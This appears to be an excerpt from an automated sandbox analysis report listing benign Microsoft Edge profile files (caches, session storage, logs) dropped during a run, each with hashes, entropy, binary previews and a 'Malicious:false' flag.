                                                                                                                                                                                                                                                                        Preview:0\r..m..........rSG.....0....z3.................;.....x.X........,T.8..`,.....L`.....,T...`......L`......Rc.+-.....exports...Rc.......module....Rc.r.....define....Rbz.......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q....2.{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):24
                                                                                                                                                                                                                                                                        Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                        MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                        SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                        SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                        SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:0\r..m..................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                                        Entropy (8bit):3.527150097341792
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:nIp0Xl/lYV/lxEstllQNObKln:ICYWs+Eqn
                                                                                                                                                                                                                                                                        MD5:291396F7A5FE67F96EC72B51F768F233
                                                                                                                                                                                                                                                                        SHA1:D303BCCD788843925AE4956E92658E4FF079E42C
                                                                                                                                                                                                                                                                        SHA-256:11C59E4E624C812D55B813B6EFE78BBE953F1876DB60BFDBFB49976B2BFB31DF
                                                                                                                                                                                                                                                                        SHA-512:A6FB9D5E0466DE981014FE25A190E5A8A6088D5BEBEB3A5AD64E4611C5D59C41F1DFD9ACEDCF8F09DC1823F31502FF01255CAE9C325D90FFF3C267A6DCFD2BC7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:@.....V.oy retne.........................X....,.................\.../.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                                        Entropy (8bit):3.527150097341792
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:nIp0Xl/lYV/lxEstllQNObKln:ICYWs+Eqn
                                                                                                                                                                                                                                                                        MD5:291396F7A5FE67F96EC72B51F768F233
                                                                                                                                                                                                                                                                        SHA1:D303BCCD788843925AE4956E92658E4FF079E42C
                                                                                                                                                                                                                                                                        SHA-256:11C59E4E624C812D55B813B6EFE78BBE953F1876DB60BFDBFB49976B2BFB31DF
                                                                                                                                                                                                                                                                        SHA-512:A6FB9D5E0466DE981014FE25A190E5A8A6088D5BEBEB3A5AD64E4611C5D59C41F1DFD9ACEDCF8F09DC1823F31502FF01255CAE9C325D90FFF3C267A6DCFD2BC7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:@.....V.oy retne.........................X....,.................\.../.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF43fd4.TMP (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                                        Entropy (8bit):3.527150097341792
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:nIp0Xl/lYV/lxEstllQNObKln:ICYWs+Eqn
                                                                                                                                                                                                                                                                        MD5:291396F7A5FE67F96EC72B51F768F233
                                                                                                                                                                                                                                                                        SHA1:D303BCCD788843925AE4956E92658E4FF079E42C
                                                                                                                                                                                                                                                                        SHA-256:11C59E4E624C812D55B813B6EFE78BBE953F1876DB60BFDBFB49976B2BFB31DF
                                                                                                                                                                                                                                                                        SHA-512:A6FB9D5E0466DE981014FE25A190E5A8A6088D5BEBEB3A5AD64E4611C5D59C41F1DFD9ACEDCF8F09DC1823F31502FF01255CAE9C325D90FFF3C267A6DCFD2BC7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:@.....V.oy retne.........................X....,.................\.../.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5405
                                                                                                                                                                                                                                                                        Entropy (8bit):3.4076827311133258
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:g9yBYPe9Xp+fhMD+ViV42Ll9iSra1DZhpXQxsZh7Y:hV9Xp+kKiZLl9iSra5ZhKxc7
                                                                                                                                                                                                                                                                        MD5:C6819D3075D82D1CD946E7BADD74F59F
                                                                                                                                                                                                                                                                        SHA1:25402AA672A6EE7F41475334C92D78FD4905C4AB
                                                                                                                                                                                                                                                                        SHA-256:9FCCC9D0C0FB69721CB35C0CA0556E8B41BEF8C8D9C6194FFC0724DE7FF3148B
                                                                                                                                                                                                                                                                        SHA-512:32D4A14DEF6127E95611833884D5F32918E1025F1C377455F0803928BFF8D07378CF9B36173516D53DA2A635AAF336C9E3BA69EC2A9E3DFD8305BF22A953518F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................i.b................next-map-id.1.Cnamespace-715d389a_cced_4d8f_ac4b_049e8279bab0-https://ntp.msn.com/.0V.e................V.e................V.e..................`..................map-0-shd_sweeper.'{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.1.s.-.f.c.r.y.p.t.,.p.r.g.-.c.o.o.k.i.e.s.y.n.c.,.p.r.g.-.w.p.o.-.p.n.p.c.,.1.s.-.n.t.f.2.-.e.v.l.c.f.c.,.1.s.-.n.t.f.2.-.b.k.n.l.c.,.1.s.-.n.t.f.2.-.i.p.t.l.c.,.1.s.-.p.r.2.-.e.v.l.c.,.1.s.-.p.r.2.-.e.v.l.c.b.b.,.1.s.-.p.r.2.-.e.v.l.c.h.,.1.s.-.p.r.2.-.e.v.l.c.n.,.1.s.-.p.r.2.-.e.v.l.c.r.p.,.1.s.-.p.r.2.-.e.v.l.c.t.,.1.s.-.p.r.g.2.-.l.i.f.e.c.y.c.l.e.,.1.s.-.w.p.o.-.p.r.2.-.n.c.a.r.d.,.1.s.-.w.p.o.-.p.r

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                                                                                        Entropy (8bit):5.113466286293974
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+sx+q2P923oH+TcwtrQMxIFUt8PF+oBQmZmw+PF+odEVkwO923oH+TcwtrQMFd:Mx+v4YebCFUt8/ym/+/qV5LYebtJ
                                                                                                                                                                                                                                                                        MD5:23E4079A4EAB799BC48DF650FC6B4D80
                                                                                                                                                                                                                                                                        SHA1:8DFE3D0DD7455C8E8DD9186EA8C1D2A3594B49E2
                                                                                                                                                                                                                                                                        SHA-256:E3651FF54E6520A450E465444E659367AA6F03972946CA06B0200F2BD70BE399
                                                                                                                                                                                                                                                                        SHA-512:13A35657570AFAB1265440CDBE673479B7BBC3F50BDFFF79D5F41ABCA298EB3561854C0C57DB738C17FD1EEA9765C5D3FEA2CC7F26296A302982B97E6D51B5EC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:32.501 1cbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-02:20:32.545 1cbc Recovering log #3.2024/12/27-02:20:32.548 1cbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                                                                                        Entropy (8bit):5.113466286293974
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+sx+q2P923oH+TcwtrQMxIFUt8PF+oBQmZmw+PF+odEVkwO923oH+TcwtrQMFd:Mx+v4YebCFUt8/ym/+/qV5LYebtJ
                                                                                                                                                                                                                                                                        MD5:23E4079A4EAB799BC48DF650FC6B4D80
                                                                                                                                                                                                                                                                        SHA1:8DFE3D0DD7455C8E8DD9186EA8C1D2A3594B49E2
                                                                                                                                                                                                                                                                        SHA-256:E3651FF54E6520A450E465444E659367AA6F03972946CA06B0200F2BD70BE399
                                                                                                                                                                                                                                                                        SHA-512:13A35657570AFAB1265440CDBE673479B7BBC3F50BDFFF79D5F41ABCA298EB3561854C0C57DB738C17FD1EEA9765C5D3FEA2CC7F26296A302982B97E6D51B5EC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:32.501 1cbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-02:20:32.545 1cbc Recovering log #3.2024/12/27-02:20:32.548 1cbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379757634178077

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1443
                                                                                                                                                                                                                                                                        Entropy (8bit):3.8029052793040132
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:3RNI0yejkpsAF4unxOtLp3X2amEtG1ChqulUOY/QKkOAM48:3RzEzFwLp2FEkChzTHOp
                                                                                                                                                                                                                                                                        MD5:1B08E49883401A410F17A23BDA154615
                                                                                                                                                                                                                                                                        SHA1:6F3C48F12091A3AE76752E2B96E74D61D3DDA753
                                                                                                                                                                                                                                                                        SHA-256:5B2A7FF5D11592718B1D125F51A892BAEA4A661B0BF32F7992456E9326AC0A70
                                                                                                                                                                                                                                                                        SHA-512:6519B12A9DF6DE5DE63E276F04E502539D95A005CA44CF9C49C34974CD4556AB832D08BA84DF9AAD2A9DACC004BA8355F73B7678B434A2C6B975432DAE6EDEA3
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SNSS.......t..............t........."t..............t..........t..........u..........u.......!..u..................................t...u...1..,...u...$...715d389a_cced_4d8f_ac4b_049e8279bab0...t..........u.........M........t......t..........................t.......................5..0...t...&...{98952893-68FF-4A5D-A164-705C709ED3DB}.....t..........t.............................u..............u...........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......S..L;*..T..L;*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                        Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                        MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                        SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                        SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                        SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):352
                                                                                                                                                                                                                                                                        Entropy (8bit):5.118482400018405
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+vyq2P923oH+Tcwt7Uh2ghZIFUt8PF+tYs1Zmw+PF+tY6RkwO923oH+Tcwt7UT:av4YebIhHh2FUt8mYs1/+mYe5LYebIh9
                                                                                                                                                                                                                                                                        MD5:1DD0EA88CA945C9C2957BF3ABE4BF5CB
                                                                                                                                                                                                                                                                        SHA1:073E0BAB15D13FF83E7ED02831F0834F805227DD
                                                                                                                                                                                                                                                                        SHA-256:6854ED4D5D1A48C09DD0FB2C75883C3983C43E7EA21EE9565AC27005DCC86A0B
                                                                                                                                                                                                                                                                        SHA-512:8302A395FF990FE59768E3BA29E59AB6E0A32EC61A8FE698C0D6248B3DBBF6796641FFEEA8982E2D0B0340B0A7DA7F8F1F13AE7C53AE36D7F3D1D9EDBD96329B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:31.687 1d30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-02:20:31.878 1d30 Recovering log #3.2024/12/27-02:20:31.878 1d30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):352
                                                                                                                                                                                                                                                                        Entropy (8bit):5.118482400018405
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+vyq2P923oH+Tcwt7Uh2ghZIFUt8PF+tYs1Zmw+PF+tY6RkwO923oH+Tcwt7UT:av4YebIhHh2FUt8mYs1/+mYe5LYebIh9
                                                                                                                                                                                                                                                                        MD5:1DD0EA88CA945C9C2957BF3ABE4BF5CB
                                                                                                                                                                                                                                                                        SHA1:073E0BAB15D13FF83E7ED02831F0834F805227DD
                                                                                                                                                                                                                                                                        SHA-256:6854ED4D5D1A48C09DD0FB2C75883C3983C43E7EA21EE9565AC27005DCC86A0B
                                                                                                                                                                                                                                                                        SHA-512:8302A395FF990FE59768E3BA29E59AB6E0A32EC61A8FE698C0D6248B3DBBF6796641FFEEA8982E2D0B0340B0A7DA7F8F1F13AE7C53AE36D7F3D1D9EDBD96329B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:31.687 1d30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-02:20:31.878 1d30 Recovering log #3.2024/12/27-02:20:31.878 1d30 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):434
                                                                                                                                                                                                                                                                        Entropy (8bit):5.217289347438271
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+K9+q2P923oH+TcwtzjqEKj3K/2jMGIFUt8PF+oXf3JZmw+PF+oBWH39VkwO9V:Jv4YebvqBQFUt8/XfZ/+/I5LYebvqBvJ
                                                                                                                                                                                                                                                                        MD5:140E8F05F11E349FF3F63F977F517CE1
                                                                                                                                                                                                                                                                        SHA1:FAA3E7E5EB9E207DDC6CAEB30076CDD4E3E7411F
                                                                                                                                                                                                                                                                        SHA-256:2554AE087AC39CD1872F9BCD63DAB552D4FDACEFF16400CB6390FAEC2409496D
                                                                                                                                                                                                                                                                        SHA-512:FDA6632A49E173385D9E80D735C1155FACE2545B05FA491B18141D1DF227C0AFD0D7C80DDE2067A21FEE124D9B30DF88B1FDA6B41CF8D0373B1A81973A391BB4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:32.539 1cd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-02:20:32.542 1cd8 Recovering log #3.2024/12/27-02:20:32.545 1cd8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):434
                                                                                                                                                                                                                                                                        Entropy (8bit):5.217289347438271
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+K9+q2P923oH+TcwtzjqEKj3K/2jMGIFUt8PF+oXf3JZmw+PF+oBWH39VkwO9V:Jv4YebvqBQFUt8/XfZ/+/I5LYebvqBvJ
                                                                                                                                                                                                                                                                        MD5:140E8F05F11E349FF3F63F977F517CE1
                                                                                                                                                                                                                                                                        SHA1:FAA3E7E5EB9E207DDC6CAEB30076CDD4E3E7411F
                                                                                                                                                                                                                                                                        SHA-256:2554AE087AC39CD1872F9BCD63DAB552D4FDACEFF16400CB6390FAEC2409496D
                                                                                                                                                                                                                                                                        SHA-512:FDA6632A49E173385D9E80D735C1155FACE2545B05FA491B18141D1DF227C0AFD0D7C80DDE2067A21FEE124D9B30DF88B1FDA6B41CF8D0373B1A81973A391BB4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:32.539 1cd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-02:20:32.542 1cd8 Recovering log #3.2024/12/27-02:20:32.545 1cd8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\02834817-9ce9-436d-9d43-5a931a8e7a23.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\1e207d9e-2d07-4c9d-9087-d79afb42934e.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):144
                                                                                                                                                                                                                                                                        Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                        MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                        SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                        SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
